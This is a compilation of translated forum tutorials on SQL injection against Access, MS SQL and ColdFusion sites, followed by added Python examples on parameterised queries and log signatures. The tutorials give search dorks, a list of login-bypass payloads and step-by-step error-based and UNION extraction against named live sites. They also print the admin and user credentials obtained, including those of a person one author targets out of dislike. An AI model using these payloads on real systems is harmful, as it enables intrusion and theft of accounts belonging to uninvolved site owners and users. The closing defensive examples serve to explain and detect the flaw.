One of the most common questions when you go hacking websites whose database is Access is: "why does the Union exploit sometimes work, and sometimes an annoying error like this gets thrown: Error Type: Microsoft JET Database Engine (0x80004005) Syntax error in FROM clause. And is there any way to carry on exploiting?" The answer is that this happens simply because Access has no comment character like the one in MSSQL; if it had, there would be nothing to talk about. I only have a little experience with this, so I'm writing this post hoping to partly answer your questions. Since HVA's rules don't allow publishing vulnerable sites, I had to cook up the vulnerable vpasp code myself and upload it to a temporary host for testing. Ok, test link: http://b.domaindlx.com/philips/asp/shopadmin.asp. The user+pass verification code in shopadmin.asp is:
username=request("Username")
userpassword=request("password")
if ucase(Username)<>"SUPPLIER" then
sql = "select * from tbluser where fldusername='" & username & "' and fldpassword='" & userpassword & "'"
Heh, in fact I deleted the two lines
username=replace(username,"'","")
userpassword=replace(userpassword,"'","")
that filter the single quote, so now it can be bypassed. Let me also go a bit deeper into bypassing this form. If you enter
username: ' or ''='
password: anything
it doesn't work, but if you bypass like this
username: anything
password: ' or ''='
it does. Why? In case 1 the query built from the form is
sql = "select * from tbluser where fldusername='' or ''='' and fldpassword='anything'"
Because of operator precedence, and is evaluated before or, so the part ''='' and fldpassword='anything' is evaluated first and is false (''='' is true but fldpassword='anything' is false, and through and that gives false); then it is or'ed with the rest of the query, fldusername='' or false, which is false (fldusername='' is false, so false or false is false) --> no bypass. Case 2:
sql = "select * from tbluser where fldusername='anything' and fldpassword='' or ''=''"
Again and is evaluated before or, so fldusername='anything' and fldpassword='' is evaluated first and is false (fldusername='anything' is false and fldpassword='' is false too), but then it is or'ed with ''='' (which is always true), so the whole query is true --> bypass. That's why you've all been bypassing with username: ' or ''=' password: ' or ''=' to be safe, right? Hehe, what I said above is just to give you a slightly deeper understanding of bypassing. Anyway, I've rambled enough and haven't got to the main point.

Ok, now inject a single quote to check precisely whether it is vulnerable to SQL injection. After injecting and submitting, it gives this:
Error Type:
Microsoft JET Database Engine (0x80040E14)
Syntax error in string in query expression 'fldusername=''' and fldpassword='''.
/asp/shopadmin.asp, line 34
Ok, with login forms it is very easy to learn the column names from the error that gets thrown (in other cases, on URLs, what comes out is usually columns you don't want at all). Ok, suppose we know the table holding the two columns fldusername and fldpassword is tbluser; okay, let's try union:
Username: ' union select 1,1 from tbluser
Password: anything
And it gives this:
Error Type:
Microsoft JET Database Engine (0x80004005)
Syntax error in FROM clause.
/asp/shopadmin.asp, line 34
Why? The query obtained from the form is
sql = "select * from tbluser where fldusername='' union select 1,1 from tbluser' and fldpassword='anything'"
Right after tbluser in the Union query there is one surplus single quote added by the standard code, so the query is meaningless; even adding and 1=2 union select would still be meaningless, which is why it throws
Syntax error in FROM clause.
Ok, so we fix it like this:
Username: ' union select 1 from tbluser where 1='1
Password: anything
The purpose of adding where 1='1 is that the quote the code appends then completes the remaining quote of the where clause --> entirely valid, isn't it? The query now looks like this:
sql = "select * from tbluser where fldusername='' union select 1 from tbluser where 1='1' and fldpassword='anything'"
Heh, a familiar error pops out:
Microsoft JET Database Engine (0x80040E14)
The number of columns in the two selected tables or queries of a union query do not match.
The rest is very easy; you surely all know it, so I won't go into it here. Done, but only done as far as fixing this when exploiting SQL injection on login forms; what about URLs, is there any difference from exploiting on a form? See you in the next post (busy with exams right now). Please post all feedback to the forum, no PMs, mail etc.
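The precedence argument in the post above, run rather than reasoned about, as an added example that is not gamma95's or VP-ASP's code: the same string-concatenated query from shopadmin.asp (with the quote-stripping removed, as in the post) is executed against an in-memory SQLite table named tbluser with two constructed rows, for the bypass placed in the username field, in the password field, and in both, and then the parameterised form of the same query is run on the same inputs. SQLite, like Jet, binds AND tighter than OR, so the row counts reproduce the post's three cases.

```python
"""Why ' or ''=' bypasses the login in one field but not the other.

Added example, not code from this ebook or from VP-ASP. The vulnerable query
mirrors the concatenation shown in shopadmin.asp above; the table rows are
constructed for the demonstration.
"""
import sqlite3


def make_db():
    """In-memory tbluser with two constructed accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("create table tbluser (fldusername text, fldpassword text)")
    con.executemany("insert into tbluser values (?, ?)",
                    [("admin", "s3cret"), ("supplier", "shipit")])
    return con


def vulnerable_query(username, userpassword):
    """The SQL the post's ASP code builds: raw string concatenation."""
    return ("select * from tbluser where fldusername='" + username
            + "' and fldpassword='" + userpassword + "'")


def vulnerable_login(con, username, userpassword):
    """Rows returned by the concatenated query; any row means 'logged in'."""
    return con.execute(vulnerable_query(username, userpassword)).fetchall()


def safe_login(con, username, userpassword):
    """Parameterised form: the quote in the input stays data, never SQL."""
    return con.execute(
        "select * from tbluser where fldusername=? and fldpassword=?",
        (username, userpassword)).fetchall()


BYPASS = "' or ''='"


def demo():
    """Row counts for the three placements the post discusses plus the fix."""
    con = make_db()
    return {
        # fldusername='' or ''='' and fldpassword='anything'
        #   -> false or (true and false) -> no rows
        "bypass in username": len(vulnerable_login(con, BYPASS, "anything")),
        # fldusername='anything' and fldpassword='' or ''=''
        #   -> (false and false) or true -> every row
        "bypass in password": len(vulnerable_login(con, "anything", BYPASS)),
        # both fields: the trailing or ''='' makes the whole predicate true
        "bypass in both": len(vulnerable_login(con, BYPASS, BYPASS)),
        # same input through bound parameters: no user has that password
        "parameterised": len(safe_login(con, "anything", BYPASS)),
    }


if __name__ == "__main__":
    print(vulnerable_query(BYPASS, "anything"))
    print(vulnerable_query("anything", BYPASS))
    for case, rows in demo().items():
        print(f"{case:20s} -> {rows} row(s)")
```

The fix is the last line of `demo()`: with bound parameters the operator-precedence question never arises, because the user's text is never parsed as SQL at all. Filtering the single quote, as the original shopadmin.asp did, only blocks the one character this bypass happens to need.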

TUTORIAL HACK CFM FROM HCV


Usually you only search for SQL-injectable sites that use ASP, right? So why not search for sites that use cfm? Today, while browsing around, I found a vulnerable site, so I decided to post it for everyone to read. If anything is technically wrong, please forgive me, I'm a newbie... Go to google and type the keyword: allinurl:"affiliate-agreement.cfm?storeid"
The results give a few pages... okie, pick one at random; I picked this one:
http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=
Add a ' and see...
http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid='
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax near ''.
The error occurred in E:\mars\wwwroot\channel69shopping\store\loadconfig.cfm: line 4
Called from E:\mars\wwwroot\channel69shopping\store\affiliate-agreement.cfm: line 23
Called from E:\mars\wwwroot\channel69shopping\store\loadconfig.cfm: line 4
Called from E:\mars\wwwroot\channel69shopping\store\affiliate-agreement.cfm: line 23
2 : SELECT *
3 : FROM config
4 : WHERE ID=#storeid#
5 : </CFQUERY>
Why does that error look so familiar... Now let's try something:
http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
Wait... see what comes out, folks:
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'administration' to a column of data type int.
Great, I've just got what I need... Get the username and pass, then. Hihi, forgot: with this one you can't get the username and pass at the same time, you have to get them one at a time... No idea why... Whatever...
What more do you need:
http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=%2bconvert(int,(select%20top%201%20username from administration

The username is Administrator. Now the pass:
http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=%2bconvert(int,(select%20top%201%20password from administration
Hehe, its pass is: cartease
Go log in: http://www.channel69shopping.com/store/admin
Checked, success. Posted for newbies like destroyer to practise; hope success.

TUTORIAL OF UNKNOWN AUTHOR


In this post I'll walk through injecting a website together with basic SQL injection theory so you can understand it better. But it is probably only for newbies; when I'm free I'll write a guide to advanced SQL injection, of course with a site for you to practise on. Let's begin: SQL injection is becoming more common, and the most frequently vulnerable sites are probably the MS SQL ones. It is very dangerous: it lets us log in without a username and password, execute code remotely, dump data and extract usernames + passwords by placing queries/commands into the input before it is handed to the web application for processing. To test whether a site is vulnerable, try entering the following into the username and password fields:
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'or''='
and many more that I won't bother writing here. Quite possibly you'll log in as admin or as some other user. But in this post I'm talking about extracting the username and password so that we walk straight into the CP. Here I'll take a random site, but when you want to attack a particular page it's different: you have to put in the effort to find the vulnerable link. Target: http://www.naame.com/manageAccount/manaccount516.asp
Now determine whether it is vulnerable to SQL injection: try entering the statements listed above; if you can't bypass the login, try entering a single quote '

Result:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '''.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33
So we know the target is vulnerable. Now what we need to do is get its table names out, using: 'having 1=1-- . Notice the --: yes, in MS SQL everything after -- is discarded.
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'LoginTable.Account' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33
Ok: Column 'LoginTable.Account' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. So we've got one table. Next step: 'GROUP BY LoginTable.Account having 1=1--
It reports:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'LoginTable.UserName' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33

We've got another column. Substitute (adding one more column, separated by a comma):

'GROUP BY LoginTable.Account, LoginTable.UserName having 1=1--

Keep doing this to get all of its tables. I've already pulled them out for you:
'group by LoginTable.Account, LoginTable.UserName, LoginTable.Password, LoginTable.DomainName, LoginTable.Credits, LoginTable.LoginType having 1=1--
Got the tables, now what? Looking at the "username" and "password" columns you're surely itching to pull them out right away, hic, but slowly, there's no rush. Now that we have the columns, we try to find a vulnerable link (find it in the address bar by adding ' after = or after =something). But this page has no vulnerable link at all, so we fall back on the input form.

Let's try (enter it into the username and password fields and submit):

'union select min(UserName),1,1,1,1,1 from LoginTable where UserName > 'h'--

Heh, you will probably ask what the 1,1,1,1,1 are and why they are there. Put simply, for newbies: count how many columns there are apart from Username and put a 1 in place of each of them. That's all. As for UserName > 'h', it will "return" some username that starts with the letter 'h'. It reports:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'h20h20' to a column of data type int.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Smile for me: we have one username on display now. To find its password, do this:

'union select Password,1,1,1,1,1 from LoginTable where UserName = 'h20h20'--

After UserName we put = 'the username we just got'--. It reports:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'legogame' to a column of data type int.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Heh, the password is legogame; go log in, what are you waiting for.

* Note: if you want to get more usernames:

'union select min(UserName),1,1,1,1,1 from LoginTable where UserName > 'h20h20'--

will return another username. If you want usernames starting with B, say, replace it with 'b'--. That's all. If you want to go after the login for a particular domain you picked in advance, use the DomainName column instead of UserName. For example, I hate that guy maika; he has the domain H0MES4RENT.com bought there, so to find his password we use:

'union select password,1,1,1,1,1 from LoginTable where DomainName = 'H0MES4RENT.com'--

It reports:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'joepinguelo' to a column of data type int.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Heh, the password is joepinguelo; now get its username too:

'union select UserName,1,1,1,1,1 from LoginTable where DomainName = 'H0MES4RENT.com'--

Result:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'joepinguelo' to a column of data type int.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33

And the Username is joepinguelo. Try logging in: Username: joepinguelo, Password: joepinguelo
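The same walkthrough seen from the defender's side: an added example (not from the ebook) with a request signature for each step above (tautology login, HAVING probe, GROUP BY enumeration, UNION SELECT extraction) and a response signature for the OLE DB error bodies the page echoes, run over constructed log lines. The log layout, the field names user and pass, and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the steps in the walkthrough above: tautology
# login bypass, HAVING / GROUP BY column enumeration, UNION SELECT extraction.
REQUEST_SIGNATURES = {
    "tautology": re.compile(
        r"""(['"]|\))\s*or\s*\(?\s*['"]?\w+['"]?\s*=\s*\(?['"]?\w+""", re.I),
    "having_probe": re.compile(r"\bhaving\s+1\s*=\s*1\s*--", re.I),
    "group_by_probe": re.compile(r"\bgroup\s+by\s+[\w.,\s]+\bhaving\b", re.I),
    "union_extraction": re.compile(r"\bunion\s+select\b.+\bfrom\b", re.I),
}
# Response-side signatures: the verbose OLE DB errors quoted in the walkthrough.
# A body containing them means the application echoes raw database errors,
# which is what turns each probe into a schema or data leak.
RESPONSE_SIGNATURES = {
    "syntax_error_leak": re.compile(r"'80040e14'|Unclosed quotation mark"),
    "type_conversion_leak": re.compile(
        r"'80040e07'|Syntax error converting the \w+ value"),
}

def classify_request(query_string: str) -> list[str]:
    """Names of the request signatures matched by a URL-decoded query string."""
    decoded = re.sub(r"\s+", " ", unquote_plus(query_string))
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]

def classify_response(body: str) -> list[str]:
    """Names of the error-leak signatures found in a response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]

def scan_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """(line number, path, matched signatures) for each suspicious line.
    Assumed layout (constructed): date time method path query status"""
    hits = []
    for number, line in enumerate(lines, start=1):
        _, _, _, path, query, _ = line.split()
        if matched := classify_request(query):
            hits.append((number, path, matched))
    return hits

# Constructed sample lines modelled on the walkthrough's requests, not real logs.
SAMPLE_LOG = [
    "2005-03-01 10:00:02 GET /shopdisplayproducts.asp cat=5%27 500",
    "2005-03-01 10:00:03 POST /manageAccount/manaccount516.asp user=hi%27+or+1%3D1--&pass=x 200",
    "2005-03-01 10:00:04 POST /manageAccount/manaccount516.asp user=%27having+1%3D1--&pass=x 500",
    "2005-03-01 10:00:05 POST /manageAccount/manaccount516.asp user=%27GROUP+BY+LoginTable.Account+having+1%3D1--&pass=x 500",
    "2005-03-01 10:00:06 POST /manageAccount/manaccount516.asp user=%27union+select+min%28UserName%29%2C1%2C1+from+LoginTable+where+UserName+%3E+%27h%27--&pass=x 500",
    "2005-03-01 10:00:07 GET /search.asp q=dogs+or+cats 200",
]
```

The lone-quote probe (cat=5') is deliberately not a request signature, since a single quote is far too common in legitimate input; it is caught on the response side instead, when the 80040e14 body is echoed back.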

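The defect behind the login form the whole walkthrough relies on, as an added example that is not from the ebook: a Python/sqlite3 stand-in for the page's query, written once with the input concatenated into the SQL text (the vulnerable pattern) and once with bound parameters. The LoginTable rows, the account names and the use of SQLite in place of the page's MS SQL are assumptions made for this example.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the LoginTable above; rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE LoginTable (UserName TEXT, Password TEXT, DomainName TEXT)")
    conn.executemany("INSERT INTO LoginTable VALUES (?, ?, ?)", [
        ("alice", "s3cret", "example.com"),
        ("bob", "hunter2", "example.net"),
    ])
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """The pattern behind the walkthrough: input concatenated into the SQL text.
    A quote in `username` closes the literal, so the rest of the input is parsed
    as SQL; a malformed remainder raises the driver error the page echoes back."""
    sql = ("SELECT UserName FROM LoginTable WHERE UserName = '" + username
           + "' AND Password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]

def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Same query with bound parameters: the values travel separately from the
    statement, so quotes, -- and keywords inside them are data, never SQL."""
    sql = "SELECT UserName FROM LoginTable WHERE UserName = ? AND Password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

def echoes_db_error(conn: sqlite3.Connection, username: str) -> bool:
    """True when the concatenating version turns this input into a SQL error,
    i.e. the kind of probe that the error messages above reward."""
    try:
        login_vulnerable(conn, username, "x")
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"  # first tautology from the list at the top of this section
    print(login_vulnerable(db, payload, "wrong"))     # every account, no password needed
    print(login_parameterized(db, payload, "wrong"))  # []
    print(echoes_db_error(db, "'"))                   # True: the lone-quote probe
```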